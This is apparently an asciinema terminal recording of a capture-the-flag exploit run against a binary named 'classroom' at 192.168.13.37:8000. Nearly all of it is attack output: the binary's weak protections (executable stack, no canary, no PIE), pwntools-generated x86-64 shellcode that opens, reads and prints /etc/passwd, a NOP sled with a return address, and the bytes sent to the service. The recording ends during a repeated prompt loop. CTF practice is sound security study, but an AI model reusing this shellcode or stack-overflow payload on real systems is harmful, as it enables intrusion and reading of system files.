{"version": 2, "width": 87, "height": 36, "timestamp": 1723391614, "idle_time_limit": 1.0, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm"}}
[0.247046, "o", "                                                                                       \r\r\u001b]0;kidd@wildwest: ~/Desktop/WORK/bsides24/pwn\u0007"]
[0.283615, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32mâ”Œâ”€â”€(\u001b[1m\u001b[32m\u001b[34mkiddã‰¿wildwest\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/Desktop/WORK/bsides24/pwn\u001b[0m\u001b[32m]\r\nâ””â”€\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[0.283844, "o", "\u001b[?1h\u001b="]
[0.284592, "o", "\u001b[?2004h"]
[8.364891, "o", "\u001b[1mp\u001b[0m"]
[8.365651, "o", "\b\u001b[1mp\u001b[0m\u001b[38;2;153;153;153mwn asm -c amd64  \"mov eax,0x2\"\u001b[39m\u001b[30D"]
[8.700451, "o", "\b\u001b[0m\u001b[4mp\u001b[39m\u001b[4my\u001b[24m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[29D"]
[8.70113, "o", "\u001b[38;2;153;153;153mthon3 -m http.server 8888\u001b[39m\u001b[25D"]
[8.875539, "o", "\b\b\u001b[4mp\u001b[4my\u001b[39m\u001b[4mt\u001b[24m"]
[8.932196, "o", "\b\u001b[4mt\u001b[39m\u001b[4mh\u001b[24m"]
[9.119592, "o", "\b\u001b[4mh\u001b[39m\u001b[4mo\u001b[24m"]
[9.321386, "o", "\b\b\b\b\b\u001b[24m\u001b[36mp\u001b[24m\u001b[36my\u001b[24m\u001b[36mt\u001b[24m\u001b[36mh\u001b[24m\u001b[36mo\u001b[36mn\u001b[39m"]
[9.520381, "o", "\b\u001b[36mn\u001b[36m3\u001b[39m"]
[9.62849, "o", "\u001b[39m "]
[9.923768, "o", "\u001b[39m\u001b[1ms\u001b[0m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[18D"]
[9.924717, "o", "\u001b[38;2;153;153;153mcript.py\u001b[39m\u001b[8D"]
[10.042048, "o", "\b\u001b[1ms\u001b[39m\u001b[1mp\u001b[0m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b\b"]
[10.187051, "o", "\b\u001b[1mp\u001b[1ml\u001b[0m"]
[10.416112, "o", "\b\u001b[1ml\u001b[1mo\u001b[0m"]
[10.639822, "o", "\b\u001b[1mo\u001b[1mi\u001b[0m"]
[10.792608, "o", "\b\u001b[1mi\u001b[1mt\u001b[0m"]
[11.981463, "o", "\b\u001b[1mt\u001b[1m.\u001b[0m"]
[12.195963, "o", "\b\u001b[1m.\u001b[1mp\u001b[0m"]
[12.511844, "o", "\b\u001b[1mp\u001b[1my\u001b[0m"]
[12.664753, "o", " "]
[13.201259, "o", "D"]
[13.275792, "o", "E"]
[13.660888, "o", "B"]
[13.80522, "o", "U"]
[13.885535, "o", "G"]
[15.421016, "o", "\u001b[?1l\u001b>"]
[15.425572, "o", "\u001b[?2004l\r\r\n"]
[15.704884, "o", "\u001b[?25l\u001b[?1h\u001b=\u001b[6n"]
[16.336662, "o", "[\u001b[1m\u001b[34m*\u001b[m] '/home/kidd/Desktop/WORK/bsides24/pwn/classroom'\u001b[K\r\n    Arch:     amd64-64-little\u001b[K\r\n    RELRO:    \u001b[32mFull RELRO\u001b[m\u001b[K\r\n"]
[16.336743, "o", "    Stack:    \u001b[31mNo canary found\u001b[m\u001b[K\r\n    NX:       \u001b[33mNX unknown - GNU_STACK missing\u001b[m\u001b[K\r\n"]
[16.336816, "o", "    PIE:      \u001b[31mNo PIE (0x400000)\u001b[m\u001b[K\r\n    Stack:    \u001b[31mExecutable\u001b[m\u001b[K\r\n"]
[16.337107, "o", "    RWX:      \u001b[31mHas RWX segments\u001b[m\u001b[K\r\n"]
[16.591609, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] cpp -C -nostdinc -undef -P -I/home/kidd/.local/lib/python3.11/site-packages/pwnlib/data/includes /dev/stdin\u001b[K\r\n"]
[16.60226, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Assembling\u001b[K\r\n    .section .shellcode,\"awx\"\u001b[K\r\n    .global _start\u001b[K\r\n"]
[16.602332, "o", "    .global __start\u001b[K\r\n    _start:\u001b[K\r\n    __start:\u001b[K\r\n    .intel_syntax noprefix\u001b[K\r\n    .p2align 0\u001b[K\r\n"]
[16.60239, "o", "        /* push b'/etc/passwd\\x00' */\u001b[K\r\n"]
[16.602493, "o", "        push 0x1010101 ^ 0x647773\u001b[K\r\n        xor dword ptr [rsp], 0x1010101\u001b[K\r\n"]
[16.602553, "o", "        mov rax, 0x7361702f6374652f\u001b[K\r\n        push rax\u001b[K\r\n        mov rdi, rsp\u001b[K\r\n"]
[16.602627, "o", "        /* call open('rdi', 0) */\u001b[K\r\n        push 2 /* 2 */\u001b[K\r\n"]
[16.602682, "o", "        pop rax\u001b[K\r\n        xor esi, esi /* 0 */\u001b[K\r\n        syscall\u001b[K\r\n"]
[16.602774, "o", "        mov rbx, rax\u001b[K\r\n"]
[16.602843, "o", "        /* call read('rbx', 'rsp', 0x100) */\u001b[K\r\n        xor eax, eax /* SYS_read */\u001b[K\r\n"]
[16.602895, "o", "        mov rdi, rbx\u001b[K\r\n        xor edx, edx\u001b[K\r\n"]
[16.602967, "o", "        mov dh, 0x100 >> 8\u001b[K\r\n        mov rsi, rsp\u001b[K\r\n"]
[16.603026, "o", "        syscall\u001b[K\r\n        /* call write('1', 'rsi', 0x100) */\u001b[K\r\n"]
[16.603072, "o", "        push 1 /* 1 */\u001b[K\r\n        pop rax\u001b[K\r\n"]
[16.603121, "o", "        push (1) /* 1 */\u001b[K\r\n        pop rdi\u001b[K\r\n"]
[16.603165, "o", "        xor edx, edx\u001b[K\r\n        mov dh, 0x100 >> 8\u001b[K\r\n        syscall\u001b[K\r\n"]
[16.603213, "o", "        /* call exit('0') */\u001b[K\r\n"]
[16.603259, "o", "        push 60 /* 0x3c */\u001b[K\r\n        pop rax\u001b[K\r\n"]
[16.603313, "o", "        xor edi, edi /* (0) */\u001b[K\r\n        syscall\u001b[K\r\n"]
[16.604123, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] /usr/bin/x86_64-linux-gnu-as -64 -o /tmp/pwn-asm-he29irtk/step2 /tmp/pwn-asm-he29irtk/step1\u001b[K\r\n"]
[16.659639, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-he29irtk/step3 /tmp/pwn-asm-he29irtk/step4\u001b[K\r\n"]
[16.811703, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] cpp -C -nostdinc -undef -P -I/home/kidd/.local/lib/python3.11/site-packages/pwnlib/data/includes /dev/stdin\u001b[K\r\n"]
[16.821114, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Assembling\u001b[K\r\n    .section .shellcode,\"awx\"\u001b[K\r\n    .global _start\u001b[K\r\n    .global __start\u001b[K\r\n"]
[16.821187, "o", "    _start:\u001b[K\r\n    __start:\u001b[K\r\n    .intel_syntax noprefix\u001b[K\r\n    .p2align 0\u001b[K\r\n        nop\u001b[K\r\n"]
[16.821747, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] /usr/bin/x86_64-linux-gnu-as -64 -o /tmp/pwn-asm-enr23gqk/step2 /tmp/pwn-asm-enr23gqk/step1\u001b[K\r\n"]
[16.87535, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-enr23gqk/step3 /tmp/pwn-asm-enr23gqk/step4\u001b[K\r\n"]
[16.881434, "o", "00000000  68 72 76 65  \u001b[34m01\u001b[m \u001b[34m81\u001b[m 34 24  \u001b[34m01\u001b[m \u001b[34m01\u001b[m \u001b[34m01\u001b[m \u001b[34m01\u001b[m  48 \u001b[34mb8\u001b[m 2f 65  â”‚hrve\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m4$\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[mH\u001b[34mÂ·\u001b[m/eâ”‚\u001b[K\r\n"]
[16.881617, "o", "00000010  74 63 2f 70  61 73 50 48  \u001b[34m89\u001b[m \u001b[34me7\u001b[m 6a \u001b[34m02\u001b[m  58 31 \u001b[34mf6\u001b[m \u001b[34m0f\u001b[m  â”‚tc/p\u001b[34mâ”‚\u001b[masPH\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mj\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[mX1\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\u001b[K\r\n"]
[16.881831, "o", "00000020  \u001b[34m05\u001b[m 48 \u001b[34m89\u001b[m \u001b[34mc3\u001b[m  31 \u001b[34mc0\u001b[m 48 \u001b[34m89\u001b[m  \u001b[34mdf\u001b[m 31 \u001b[34md2\u001b[m \u001b[34mb6\u001b[m  \u001b[34m01\u001b[m 48 \u001b[34m89\u001b[m \u001b[34me6\u001b[m  â”‚\u001b[34mÂ·\u001b[mH\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m1\u001b[34mÂ·\u001b[mH\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m1\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[mH\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\u001b[K\r\n"]
[16.881926, "o", "00000030  \u001b[34m0f\u001b[m \u001b[34m05\u001b[m 6a \u001b[34m01\u001b[m  58 6a \u001b[34m01\u001b[m 5f  31 \u001b[34md2\u001b[m \u001b[34mb6\u001b[m \u001b[34m01\u001b[m  \u001b[34m0f\u001b[m \u001b[34m05\u001b[m 6a 3c  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mj\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[mXj\u001b[34mÂ·\u001b[m_\u001b[34mâ”‚\u001b[m1\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mj<â”‚\u001b[K\r\n"]
[16.882126, "o", "00000040  58 31 \u001b[32mff\u001b[m \u001b[34m0f\u001b[m  \u001b[34m05\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m        â”‚X1\u001b[32mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\u001b[K\r\n"]
[16.88231, "o", "0000004e\u001b[K\r\n"]
[17.027911, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] cpp -C -nostdinc -undef -P -I/home/kidd/.local/lib/python3.11/site-packages/pwnlib/data/includes /dev/stdin\u001b[K\r\n"]
[17.036869, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Assembling\u001b[K\r\n    .section .shellcode,\"awx\"\u001b[K\r\n    .global _start\u001b[K\r\n"]
[17.036933, "o", "    .global __start\u001b[K\r\n    _start:\u001b[K\r\n    __start:\u001b[K\r\n    .intel_syntax noprefix\u001b[K\r\n"]
[17.037017, "o", "    .p2align 0\u001b[K\r\n        nop\u001b[K\r\n"]
[17.037534, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] /usr/bin/x86_64-linux-gnu-as -64 -o /tmp/pwn-asm-ym48wm7a/step2 /tmp/pwn-asm-ym48wm7a/step1\u001b[K\r\n"]
[17.090701, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-ym48wm7a/step3 /tmp/pwn-asm-ym48wm7a/step4\u001b[K\r\n"]
[17.113548, "o", "00000000  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\u001b[K\r\n*\u001b[K\r\n"]
[17.113799, "o", "00000080  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m0c\u001b[m \u001b[34m09\u001b[m 40 \u001b[31m00\u001b[m  \u001b[31m00\u001b[m \u001b[31m00\u001b[m \u001b[31m00\u001b[m \u001b[31m00\u001b[m  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m@\u001b[31mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[31mÂ·\u001b[m\u001b[31mÂ·\u001b[m\u001b[31mÂ·\u001b[m\u001b[31mÂ·\u001b[mâ”‚\u001b[K\r\n"]
[17.114005, "o", "00000090  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\u001b[K\r\n*\u001b[K\r\n"]
[17.114181, "o", "00000190\u001b[K\r\n"]
[17.114408, "o", "Opening connection to 192.168.13.37 on port 8000\u001b[K\r\n"]
[17.114852, "o", "\u001b[35;1H[\u001b[1m\u001b[34m|\u001b[m] Opening connection to 192.168.13.37 on port 8000\u001b[K\r\n\u001b[J"]
[17.11702, "o", "\u001b[35;5HOpening connection to 192.168.13.37 on port 8000: Trying 192.168.13.37\u001b[K\r\n\u001b[J"]
[17.121622, "o", "\u001b[35;5HOpening connection to 192.168.13.37 on port 8000: Done\u001b[K\r\n\u001b[J"]
[17.121826, "o", "\u001b[35;1H[\u001b[1m\u001b[32m+\u001b[m] \u001b[36;1H\u001b[J"]
[17.12206, "o", "[\u001b[1m\u001b[34m*\u001b[m] Paused (press any to continue)\u001b[K\r\n"]
[19.185242, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x7e bytes:\u001b[K\r\n"]
[19.188794, "o", "    00000000  4b 69 64 73  20 6d 75 73  74 20 66 6f  6c 6c 6f 77  â”‚Kids\u001b[34mâ”‚\u001b[m mus\u001b[34mâ”‚\u001b[mt fo\u001b[34mâ”‚\u001b[mllowâ”‚\r\n"]
[19.188945, "o", "    00000010  20 74 68 65  20 72 75 6c  65 73 21 \u001b[31m0a\u001b[m  31 2e 20 4e  â”‚ the\u001b[34mâ”‚\u001b[m rul\u001b[34mâ”‚\u001b[mes!\u001b[31mÂ·\u001b[m\u001b[34mâ”‚\u001b[m1. Nâ”‚\r\n    00000020  6f 20 63 68  65 61 74 69  6e 67 21 20  20 20 \u001b[34me2\u001b[m \u001b[34m9d\u001b[m  â”‚o ch\u001b[34mâ”‚\u001b[meati\u001b[34mâ”‚\u001b[mng! \u001b[34mâ”‚\u001b[m  \u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\r\n"]
[19.189071, "o", "    00000030  \u001b[34m8c\u001b[m \u001b[31m0a\u001b[m 32 2e  20 4e 6f 20  73 77 65 61  72 69 6e 67  â”‚\u001b[34mÂ·\u001b[m\u001b[31mÂ·\u001b[m2.\u001b[34mâ”‚\u001b[m No \u001b[34mâ”‚\u001b[mswea\u001b[34mâ”‚\u001b[mringâ”‚\r\n"]
[19.189311, "o", "    00000040  21 20 20 20  \u001b[34me2\u001b[m \u001b[34m9d\u001b[m \u001b[34m8c\u001b[m \u001b[31m0a\u001b[m  33 2e 20 4e  6f 20 \u001b[34mf0\u001b[m \u001b[34m9f\u001b[m  â”‚!   \u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[31mÂ·\u001b[m\u001b[34mâ”‚\u001b[m3. N\u001b[34mâ”‚\u001b[mo \u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\r\n"]
[19.18945, "o", "    00000050  \u001b[34m9a\u001b[m \u001b[34ma9\u001b[m 20 73  68 61 72 69  6e 67 21 20  \u001b[34me2\u001b[m \u001b[34m9d\u001b[m \u001b[34m8c\u001b[m \u001b[31m0a\u001b[m  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m s\u001b[34mâ”‚\u001b[mhari\u001b[34mâ”‚\u001b[mng! \u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[31mÂ·\u001b[mâ”‚\r\n    00000060  \u001b[31m0a\u001b[m 49 73 20  65 76 65 72  79 74 68 69  6e 67 20 63  â”‚\u001b[31mÂ·\u001b[mIs \u001b[34mâ”‚\u001b[mever\u001b[34mâ”‚\u001b[mythi\u001b[34mâ”‚\u001b[mng câ”‚\r\n"]
[19.189516, "o", "    00000070  6c 65 61 72  3f 20 28 79  2f 6e 29 \u001b[31m0a\u001b[m  3e 20        â”‚lear\u001b[34mâ”‚\u001b[m? (y\u001b[34mâ”‚\u001b[m/n)\u001b[31mÂ·\u001b[m\u001b[34mâ”‚\u001b[m> â”‚\u001b[K\r\n    0000007e\u001b[K\r\n"]
[19.189775, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x4f bytes:\u001b[K\r\n"]
[19.193566, "o", "    00000000  68 72 76 65  \u001b[34m01\u001b[m \u001b[34m81\u001b[m 34 24  \u001b[34m01\u001b[m \u001b[34m01\u001b[m \u001b[34m01\u001b[m \u001b[34m01\u001b[m  48 \u001b[34mb8\u001b[m 2f 65  â”‚hrve\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m4$\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[mH\u001b[34mÂ·\u001b[m/eâ”‚\r\n"]
[19.193702, "o", "    00000010  74 63 2f 70  61 73 50 48  \u001b[34m89\u001b[m \u001b[34me7\u001b[m 6a \u001b[34m02\u001b[m  58 31 \u001b[34mf6\u001b[m \u001b[34m0f\u001b[m  â”‚tc/p\u001b[34mâ”‚\u001b[masPH\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mj\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[mX1\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\r\n"]
[19.193868, "o", "    00000020  \u001b[34m05\u001b[m 48 \u001b[34m89\u001b[m \u001b[34mc3\u001b[m  31 \u001b[34mc0\u001b[m 48 \u001b[34m89\u001b[m  \u001b[34mdf\u001b[m 31 \u001b[34md2\u001b[m \u001b[34mb6\u001b[m  \u001b[34m01\u001b[m 48 \u001b[34m89\u001b[m \u001b[34me6\u001b[m  â”‚\u001b[34mÂ·\u001b[mH\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m1\u001b[34mÂ·\u001b[mH\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m1\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[mH\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\r\n"]
[19.194016, "o", "    00000030  \u001b[34m0f\u001b[m \u001b[34m05\u001b[m 6a \u001b[34m01\u001b[m  58 6a \u001b[34m01\u001b[m 5f  31 \u001b[34md2\u001b[m \u001b[34mb6\u001b[m \u001b[34m01\u001b[m  \u001b[34m0f\u001b[m \u001b[34m05\u001b[m 6a 3c  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mj\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[mXj\u001b[34mÂ·\u001b[m_\u001b[34mâ”‚\u001b[m1\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mj<â”‚\r\n"]
[19.194239, "o", "    00000040  58 31 \u001b[32mff\u001b[m \u001b[34m0f\u001b[m  \u001b[34m05\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[31m0a\u001b[m     â”‚X1\u001b[32mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[31mÂ·\u001b[mâ”‚\u001b[K\r\n    0000004f\u001b[K\r\n"]
[19.210558, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x32 bytes:\u001b[K\r\n"]
[19.21075, "o", "    b'\\n'\u001b[K\r\n"]
[19.210822, "o", "    b'Alright! Do you have any more questions? (y/n)\\n'\u001b[K\r\n"]
[19.210998, "o", "    b'> '\u001b[K\r\n"]
[19.211166, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n"]
[19.211305, "o", "    b'y\\n'\u001b[K\r\n"]
[19.22559, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x15 bytes:\u001b[K\r\n"]
[19.225834, "o", "    b'Feel free to ask!\\n'\u001b[K\r\n"]
[19.225906, "o", "    b'>> '\u001b[K\r\n"]
[19.226066, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n"]
[19.226276, "o", "    b'y\\n'\u001b[K\r\n"]
[19.241545, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x33 bytes:\u001b[K\r\n"]
[19.241716, "o", "    b'Very interesting question! Let me think about it..\\n'\u001b[K\r\n"]
[19.286067, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x32 bytes:\u001b[K\r\n"]
[19.286284, "o", "    b'\\n'\u001b[K\r\n"]
[19.286442, "o", "    b'Alright! Do you have any more questions? (y/n)\\n'\u001b[K\r\n"]
[19.286584, "o", "    b'> '\u001b[K\r\n"]
[19.286821, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n    b'y\\n'\u001b[K\r\n"]
[19.29689, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x15 bytes:\u001b[K\r\n"]
[19.297094, "o", "    b'Feel free to ask!\\n'\u001b[K\r\n"]
[19.297237, "o", "    b'>> '\u001b[K\r\n"]
[19.297487, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n    b'y\\n'\u001b[K\r\n"]
[19.31347, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x33 bytes:\u001b[K\r\n"]
[19.313601, "o", "    b'Very interesting question! Let me think about it..\\n'\u001b[K\r\n"]
[19.358188, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x32 bytes:\u001b[K\r\n"]
[19.358324, "o", "    b'\\n'\u001b[K\r\n"]
[19.35852, "o", "    b'Alright! Do you have any more questions? (y/n)\\n'\u001b[K\r\n"]
[19.358661, "o", "    b'> '\u001b[K\r\n"]
[19.358858, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n"]
[19.359007, "o", "    b'y\\n'\u001b[K\r\n"]
[19.368735, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x15 bytes:\u001b[K\r\n"]
[19.3689, "o", "    b'Feel free to ask!\\n'\u001b[K\r\n"]
[19.369113, "o", "    b'>> '\u001b[K\r\n"]
[19.369249, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n"]
[19.369467, "o", "    b'y\\n'\u001b[K\r\n"]
[19.381751, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x33 bytes:\u001b[K\r\n"]
[19.381935, "o", "    b'Very interesting question! Let me think about it..\\n'\u001b[K\r\n"]
[19.425976, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x32 bytes:\u001b[K\r\n"]
[19.426105, "o", "    b'\\n'\u001b[K\r\n"]
[19.426418, "o", "    b'Alright! Do you have any more questions? (y/n)\\n'\u001b[K\r\n"]
[19.42649, "o", "    b'> '\u001b[K\r\n"]
[19.426719, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n"]
[19.426943, "o", "    b'y\\n'\u001b[K\r\n"]
[19.437307, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x15 bytes:\u001b[K\r\n"]
[19.437496, "o", "    b'Feel free to ask!\\n'\u001b[K\r\n"]
[19.43768, "o", "    b'>> '\u001b[K\r\n"]
[19.437907, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n"]
[19.438163, "o", "    b'y\\n'\u001b[K\r\n"]
[19.450257, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x33 bytes:\u001b[K\r\n"]
[19.450555, "o", "    b'Very interesting question! Let me think about it..\\n'\u001b[K\r\n"]
